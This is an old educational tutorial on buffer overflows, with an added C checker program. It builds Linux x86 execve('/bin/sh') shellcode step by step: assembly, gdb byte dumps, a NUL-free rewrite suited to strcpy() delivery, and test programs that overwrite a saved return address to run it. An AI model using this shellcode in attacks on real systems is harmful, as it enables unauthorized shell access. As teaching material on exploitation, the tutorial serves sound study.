introduction to buffer overflow.htm
<br><b>Now let's take a look at the __execve function</b>
<br>
<br>__execve+1 mov 0x10(%esp,1),%edx
<br><b>%edx gets the 3rd argument, envp (we passed NULL)</b>
<br>
<br>__execve+5 mov 0xc(%esp,1),%ecx
<br><b>%ecx gets the 2nd argument, the address of sh (argv)</b>
<br>
<br>__execve+9 mov 0x8(%esp,1),%ebx
<br><b>%ebx gets the 1st argument, the address of "/bin/sh" (sh[0])</b>
<br>
<br>__execve+13 mov $0xb,%eax
<br><b>0xb (11) is the system call number of execve</b>
<br>
<br>__execve+18 int $0x80
<br><b>switch to kernel mode: the kernel reads the call number from %eax and the arguments from %ebx, %ecx and %edx</b>
</center>
<br>
<br>
<p>So, what the shellcode has to do:</p>
<br>We must have the address of a NULL pointer (an empty envp array) in %edx
<br>We must have the address of sh in %ecx
<br>We must have the address of "/bin/sh" in %ebx
<br>We must have 0xb in %eax
<br>We must execute int $0x80
<p>Well, we need the exact address in memory of our "/bin/sh" string, and the code
must not depend on where it is loaded. We can simply put "/bin/sh" right after a
call instruction: call pushes the return address (EIP) onto the stack, and that pushed
EIP is exactly the address of our string. Look at pic 0.1:</p>
<br>
<center>
<br>[JJaaaaaaaaaaaaaaaaaaaaaaaaCCssssss]
<br> |^_______________________^|
<br> |________________________|
</center>
<br>
<p>At the beginning of the code we put a JMP that jumps forward to the CALL. The CALL
saves EIP (which now points at "/bin/sh", since the string follows the CALL) and jumps
back to the start of the code (a), where a popl takes that saved EIP off the stack:
it is the address of our string.</p>
<br>a - stands for code
<br>J - stands for JMP
<br>C - stands for CALL
<br>s - stands for "/bin/sh"
<p>Well, let's write this in asm:</p>
<br>
<br>
<center>
<br>------------ shell1.cpp Code Starts Here ----------------
<br>int main(){
<br>__asm__("jmp 1f \n" //jump forward to the call (+0x1e bytes)
<br>"2: popl %esi \n" //pop the saved EIP: now %esi holds the address of "/bin/sh"
<br>"movl %esi,0x8(%esi) \n" //sh[0] = address of "/bin/sh", stored right behind the string
<br>"movl $0x0,0xc(%esi) \n" //sh[1] = NULL, the 3rd argument goes right after sh[0]
<br>"movb $0x0,0x7(%esi) \n" //terminate "/bin/sh" with '\0'
<br>"movl %esi,%ebx \n" //1st argument: address of "/bin/sh" (sh[0]) in %ebx
<br>"leal 0x8(%esi),%ecx \n" //2nd argument: address of sh in %ecx
<br>"leal 0xc(%esi),%edx \n" //3rd argument: address of the NULL in %edx
<br>"movl $0xb,%eax \n" //system call number of execve in %eax
<br>"int $0x80 \n" //kernel mode
<br>"1: call 2b \n" //call back to popl %esi (-0x23 bytes); pushes the address of the string
<br>".string \"/bin/sh\" \n"); //our string
<br>return 0;
<br>}
<br>------------ shell1.cpp Code Ends Here ----------------
</center>
<br>
<br>
<p>Let's compile this and look at the bytes in gdb. (The listings below come from a
1999-era 32-bit toolchain; on a current distribution you need a 32-bit build with the
modern protections turned off to reproduce the later steps, e.g.
cc -m32 -fno-stack-protector -z execstack, and ASLR will move the addresses.)</p>
<br>
<center>
<br>root@scorpion#cc shell1.cpp -o shell1
<br>root@scorpion#gdb shell1
<br>GNU gdb 4.18
<br>Copyright 1998 Free Software Foundation, Inc.
<br>GDB is free software, covered by the GNU General Public License, and you are
<br>welcome to change it and/or distribute copies of it under certain conditions.
<br>Type "show copying" to see the conditions.
<br>There is absolutely no warranty for GDB. Type "show warranty" for details.
<br>This GDB was configured as "i686-pc-linux-gnu"...
<br>(gdb) x/bx main+3 <------- the jmp starts here
<br>0x8048733 <main+3>: 0xeb
<br>(gdb)
<br>0x8048734 <main+4>: 0x1e
<br>(gdb)
<br>0x8048735 <main+5>: 0x5e
<br>(gdb)
<br>0x8048736 <main+6>: 0x89
<br>(gdb)
<br>0x8048737 <main+7>: 0x76
<br>(gdb)
<br>0x8048738 <main+8>: 0x08
<br>(gdb)
<br>0x8048739 <main+9>: 0xc6
<br>(gdb)
<br>0x804873a <main+10>: 0x46
<br>(gdb)
<br>0x804873b <main+11>: 0x07
<br>(gdb)
<br>0x804873c <main+12>: 0x00
<br>(gdb)
<br>0x804873d <main+13>: 0xc7
<br>(gdb)
<br>0x804873e <main+14>: 0x46
<br>(gdb)
<br>0x804873f <main+15>: 0x0c
<br>(gdb)
<br>0x8048740 <main+16>: 0x00
<br>(gdb)
<br>0x8048741 <main+17>: 0x00
<br>(gdb)
<br>0x8048742 <main+18>: 0x00
<br>(gdb)
<br>0x8048743 <main+19>: 0x00
<br>(gdb)
<br>0x8048744 <main+20>: 0x89
<br>(gdb)
<br>0x8048745 <main+21>: 0xf3
<br>(gdb)
<br>0x8048746 <main+22>: 0x8d
<br>(gdb)
<br>0x8048747 <main+23>: 0x4e
<br>(gdb)
<br>0x8048748 <main+24>: 0x08
<br>(gdb)
<br>0x8048749 <main+25>: 0x8d
<br>(gdb)
<br>0x804874a <main+26>: 0x56
<br>(gdb)
<br>0x804874b <main+27>: 0x0c
<br>(gdb)
<br>0x804874c <main+28>: 0xb8
<br>(gdb)
<br>0x804874d <main+29>: 0x0b
<br>(gdb)
<br>0x804874e <main+30>: 0x00
<br>(gdb)
<br>0x804874f <main+31>: 0x00
<br>(gdb)
<br>0x8048750 <main+32>: 0x00
<br>(gdb)
<br>0x8048751 <main+33>: 0xcd
<br>(gdb)
<br>0x8048752 <main+34>: 0x80
<br>(gdb)
<br>0x8048753 <main+35>: 0xe8
<br>(gdb)
<br>0x8048754 <main+36>: 0xdd
<br>(gdb)
<br>0x8048755 <main+37>: 0xff
<br>(gdb)
<br>0x8048756 <main+38>: 0xff
<br>(gdb)
<br>0x8048757 <main+39>: 0xff
<br>(gdb)
<br>0x8048758 <main+40>: 0x2f
<br>(gdb)
<br>0x8048759 <main+41>: 0x62
<br>(gdb)
<br>0x804875a <main+42>: 0x69
<br>(gdb)
<br>0x804875b <main+43>: 0x6e
<br>(gdb)
<br>0x804875c <main+44>: 0x2f
<br>(gdb)
<br>0x804875d <main+45>: 0x73
<br>(gdb)
<br>0x804875e <main+46>: 0x68 <--------- c0de ends here
<br>(gdb)quit
</center>
<br>
<br>
<p>Now let's put those bytes into a C string and write our shellcode:</p>
<br>
<br>
<br><center>
<br>--------------- shell2.cpp Code Starts Here ------------------
<br>char c0de[]=
<br>"\xeb\x1e\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00"
<br>"\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb8\x0b\x00\x00\x00"
<br>"\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
<br>
<br>int main(){
<br>char buf[5];
<br>long *ret=(long *)(buf+12); //buf+12 is where this compiler placed main's saved return address
<br>*ret=(long)c0de; //so main "returns" into c0de
<br>}
<br>--------------- shell2.cpp Code Ends Here ------------------
<br>root@scorpion#cc shell2.cpp -o shell2
<br>root@scorpion#./shell2
<br>sh-2.03
</center>
<br>
<br>
<p>This works. "\x2f\x62\x69\x6e\x2f\x73\x68" is the same as writing "/bin/sh"
(it sits at the end of the code). The offset 12 in shell2.cpp is where this
compiler put the saved return address relative to buf; it depends on the frame
layout, so verify it in gdb rather than trust the constant.
Now take a look at the shellcode: there is a \x00 ('\0') byte in several places.
As we know, '\0' is the end of a C string, so strcpy() and the other string functions
stop copying at the first one and our shellcode would not be copied completely.
Let's get rid of those '\0' bytes.</p>
<br>
<br>
<center>
<br>change this -> to this
<br>-----------------------------------------------------
<br>(added) -> xorl %eax,%eax
<br>movb $0x0,0x7(%esi) -> movb %al,0x7(%esi)
<br>movl $0x0,0xc(%esi) -> movl %eax,0xc(%esi)
<br>movl $0xb,%eax -> movb $0xb,%al
<br>-----------------------------------------------------
</center>
<br>
<br>
<p>Rewrite the asm with these changes and we get this:</p>
<br>
<br>
<center>
<br>--------------- shell3.cpp Code Starts Here ---------------
<br>int main(){
<br>__asm__("jmp 1f \n" //jump forward to the call (+0x18 bytes)
<br>"2: popl %esi \n" //pop the saved EIP: the address of "/bin/sh"
<br>"movl %esi,0x8(%esi) \n" //sh[0] = address of "/bin/sh"
<br>"xorl %eax,%eax \n" //%eax = 0 without a 0x00 byte in the encoding
<br>"movb %al,0x7(%esi) \n" //terminate "/bin/sh" with '\0'
<br>"movl %eax,0xc(%esi) \n" //sh[1] = NULL
<br>"movl %esi,%ebx \n" //1st argument: address of "/bin/sh"
<br>"leal 0x8(%esi),%ecx \n" //2nd argument: address of sh
<br>"leal 0xc(%esi),%edx \n" //3rd argument: address of the NULL
<br>"movb $0xb,%al \n" //execve's system call number as a 1-byte immediate
<br>"int $0x80 \n" //kernel mode
<br>"1: call 2b \n" //call back to popl %esi (-0x1d bytes); pushes the address of the string
<br>".string \"/bin/sh\" \n");
<br>return 0;
<br>}
<br>--------------- shell3.cpp Code Ends Here ---------------
</center>
<br>
<br>
<p>Compile and disassemble it the same way:</p>
<br>
<center>
<br>root@scorpion#cc shell3.cpp -o shell3
<br>root@scorpion#gdb shell3
<br>GNU gdb 4.18
<br>Copyright 1998 Free Software Foundation, Inc.
<br>GDB is free software, covered by the GNU General Public License, and you are
<br>welcome to change it and/or distribute copies of it under certain conditions.
<br>Type "show copying" to see the conditions.
<br>There is absolutely no warranty for GDB. Type "show warranty" for details.
<br>This GDB was configured as "i686-pc-linux-gnu"...
<br>(gdb) x/bx main+3 <--------- the jmp starts here
<br>0x80483c3 <main+3>: 0xeb
<br>(gdb)
<br>0x80483c4 <main+4>: 0x18
<br>(gdb)
<br>0x80483c5 <main+5>: 0x5e
<br>(gdb)
<br>0x80483c6 <main+6>: 0x89
<br>(gdb)
<br>0x80483c7 <main+7>: 0x76
<br>(gdb)
<br>0x80483c8 <main+8>: 0x08
<br>(gdb)
<br>0x80483c9 <main+9>: 0x31
<br>(gdb)
<br>0x80483ca <main+10>: 0xc0
<br>(gdb)
<br>0x80483cb <main+11>: 0x88
<br>(gdb)
<br>0x80483cc <main+12>: 0x46
<br>(gdb)
<br>0x80483cd <main+13>: 0x07
<br>(gdb)
<br>0x80483ce <main+14>: 0x89
<br>(gdb)
<br>0x80483cf <main+15>: 0x46
<br>(gdb)
<br>0x80483d0 <main+16>: 0x0c
<br>(gdb)
<br>0x80483d1 <main+17>: 0x89
<br>(gdb)
<br>0x80483d2 <main+18>: 0xf3
<br>(gdb)
<br>0x80483d3 <main+19>: 0x8d
<br>(gdb)
<br>0x80483d4 <main+20>: 0x4e
<br>(gdb)
<br>0x80483d5 <main+21>: 0x08
<br>(gdb)
<br>0x80483d6 <main+22>: 0x8d
<br>(gdb)
<br>0x80483d7 <main+23>: 0x56
<br>(gdb)
<br>0x80483d8 <main+24>: 0x0c
<br>(gdb)
<br>0x80483d9 <main+25>: 0xb0
<br>(gdb)
<br>0x80483da <main+26>: 0x0b
<br>(gdb)
<br>0x80483db <main+27>: 0xcd
<br>(gdb)
<br>0x80483dc <main+28>: 0x80
<br>(gdb)
<br>0x80483dd <main+29>: 0xe8
<br>(gdb)
<br>0x80483de <main+30>: 0xe3
<br>(gdb)
<br>0x80483df <main+31>: 0xff
<br>(gdb)
<br>0x80483e0 <main+32>: 0xff
<br>(gdb)
<br>0x80483e1 <main+33>: 0xff
<br>(gdb)
<br>0x80483e2 <main+34>: 0x2f
<br>(gdb)
<br>0x80483e3 <main+35>: 0x62
<br>(gdb)
<br>0x80483e4 <main+36>: 0x69
<br>(gdb)
<br>0x80483e5 <main+37>: 0x6e
<br>(gdb)
<br>0x80483e6 <main+38>: 0x2f
<br>(gdb)
<br>0x80483e7 <main+39>: 0x73
<br>(gdb)
<br>0x80483e8 <main+40>: 0x68 <---------c0de ends here
<br>(gdb)quit
</center>
<br>
<br>
<p>Rewrite the program with the new bytes:</p>
<br>
<br>
<center>
<br>-------------- shell4.cpp Code Starts Here ----------------
<br>char c0de[]=
<br>"\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3"
<br>"\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f"
<br>"\x62\x69\x6e\x2f\x73\x68";
<br>
<br>int main(){
<br>char buf[5];
<br>long *ret=(long *)(buf+12); //buf+12 is where this compiler placed main's saved return address
<br>*ret=(long)c0de; //so main "returns" into c0de
<br>}
<br>-------------- shell4.cpp Code Ends Here ----------------
<br>compile shell4.cpp
<br>root@scorpion#cc shell4.cpp -o shell4
<br>root@scorpion#./shell4
<br>sh-2.03#
</center>
<br>
<br>
<p>It works, and it is smaller than our previous c0de and contains no 0x00 (\x00, '\0')
byte, so strcpy(), sprintf() and the other string functions will copy all of it.</p>
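<p>As an added check that is not part of the original tutorial (written for this edit;
the two arrays are the shellcodes from shell2.cpp and shell4.cpp above, the function
names are my own), the following C program does by machine what the page does by hand
in gdb: it follows the jmp -> call -> popl wiring to confirm that the address the call
pushes is the start of "/bin/sh", counts the NUL bytes, and measures how much of each
shellcode actually survives being delivered through strcpy(). It only inspects the bytes,
so it runs on any platform, including 64-bit hosts where the shellcode itself could not.</p>

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* The two shellcodes from the page, copied byte for byte: shell2's version (still
 * containing NUL bytes) and shell4's NUL-free version. Initialising from a string
 * literal appends one extra NUL, exactly like the original char c0de[] declarations. */
static const unsigned char code_with_nulls[] =
    "\xeb\x1e\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00"
    "\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb8\x0b\x00\x00\x00"
    "\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
static const unsigned char code_no_nulls[] =
    "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3"
    "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f"
    "\x62\x69\x6e\x2f\x73\x68";
/* Lengths of the shellcode proper, without the literal's terminating NUL. */
static const size_t code_with_nulls_len = sizeof(code_with_nulls) - 1;
static const size_t code_no_nulls_len = sizeof(code_no_nulls) - 1;

/* Number of 0x00 bytes inside the shellcode. */
size_t count_nulls(const unsigned char *c, size_t n)
{
    size_t k = 0;
    for (size_t i = 0; i < n; i++)
        if (c[i] == 0)
            k++;
    return k;
}

/* How many bytes arrive when the shellcode is delivered through strcpy():
 * copy it for real into a scratch buffer and measure what got there. */
size_t strcpy_survives(const unsigned char *c)
{
    char dst[64] = {0};
    strcpy(dst, (const char *)c);   /* stops at the first NUL, like any overflow via strcpy */
    return strlen(dst);
}

/* Follow the "jmp -> call -> popl %esi" wiring and confirm that the address the
 * call pushes is the start of "/bin/sh" and that the string is the last thing in
 * the code. Returns 1 if consistent, 0 otherwise; *str_off receives the offset
 * of "/bin/sh". Assumes the forward short jmp / backward call layout of the page. */
int check_wiring(const unsigned char *c, size_t n, size_t *str_off)
{
    if (n < 3 || c[0] != 0xeb || c[1] >= 0x80 || c[2] != 0x5e)  /* jmp rel8 (forward) ... popl %esi */
        return 0;
    size_t call_off = 2 + c[1];                     /* jmp target = next instruction + disp8 */
    if (call_off + 5 > n || c[call_off] != 0xe8)    /* must land on a call rel32 */
        return 0;
    uint32_t u = (uint32_t)c[call_off + 1]
               | (uint32_t)c[call_off + 2] << 8
               | (uint32_t)c[call_off + 3] << 16
               | (uint32_t)c[call_off + 4] << 24;
    long rel = (u & 0x80000000u) ? -(long)(uint32_t)(~u + 1) : (long)u;  /* sign-extend rel32 */
    size_t ret_addr = call_off + 5;                 /* what the call pushes: the string's address */
    if ((long)ret_addr + rel != 2)                  /* the call must jump back to popl %esi */
        return 0;
    if (ret_addr + 7 != n || memcmp(c + ret_addr, "/bin/sh", 7) != 0)
        return 0;
    *str_off = ret_addr;
    return 1;
}

static void report(const char *name, const unsigned char *c, size_t n)
{
    size_t off = 0;
    int ok = check_wiring(c, n, &off);
    printf("%s: %zu bytes, %zu NUL bytes, strcpy() delivers %zu bytes, wiring %s",
           name, n, count_nulls(c, n), strcpy_survives(c), ok ? "ok" : "BROKEN");
    if (ok)
        printf(", \"/bin/sh\" at offset %zu", off);
    printf("\n");
}

int main(void)
{
    report("shell2 c0de", code_with_nulls, code_with_nulls_len);
    report("shell4 c0de", code_no_nulls, code_no_nulls_len);
    return 0;
}
```

<p>For the shell2 code the program reports 8 NUL bytes and only 9 bytes surviving strcpy()
(everything up to the 0x00 of movb $0x0,0x7(%esi)), while the shell4 code comes through
whole; both pass the wiring check, which is the same arithmetic as the hand-computed
0x1e/-0x23 and 0x18/-0x1d displacements above.</p>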
<p>Here is a simple program that prints the stack pointer of the running process:</p>
<br>
<br>
<center>
<br>------- sp.cpp Code Stars Here-----------
<br>#include &lt;stdio.h&gt;
<br>
<br>unsigned long get_esp(void){
<br>unsigned long esp;
<br>__asm__("movl %%esp,%0" : "=r"(esp)); //copy %esp out through an output operand
<br>return esp;
<br>}
<br>
<br>int main(){
<br>printf("Stack pointer is 0x%lx\n",get_esp());
<br>return 0;
<br>}
<br>------- sp.cpp Code Ends Here-----------
<br>root@scorpion#cc sp.cpp -o sp
<br>root@scoprion#./sp
<br>Stack pointer is 0xbffff910 <--- your value will differ; with ASLR it changes on every run
<br>root@scorpion#
</center>
<br>
<br>
Text was written using the vi and joe text editors
<br>
-EOF-